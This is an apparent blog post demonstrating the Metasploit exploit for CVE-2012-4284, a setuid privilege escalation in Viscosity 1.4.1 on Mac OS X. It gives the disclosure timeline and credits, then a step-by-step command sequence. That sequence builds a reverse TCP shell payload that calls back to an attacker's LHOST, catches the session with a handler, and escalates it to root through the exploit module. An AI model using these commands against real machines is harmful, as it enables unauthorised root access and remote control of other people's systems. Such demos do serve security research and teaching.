Tag Archives: Viscosity

CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Vulnerability corrected by the vendor the 2012-08-30
Metasploit PoC provided the 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-4284
OSVDB-84709

Affected version(s) :

Viscosity 1.4.1 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Viscosity 1.4.1

Description :

This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.

Commands :

Create a OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload on the victim OS X 10.7.5

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload, a session will be created.
This session runs with current user privileges.

use exploit/osx/local/setuid_viscosity
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id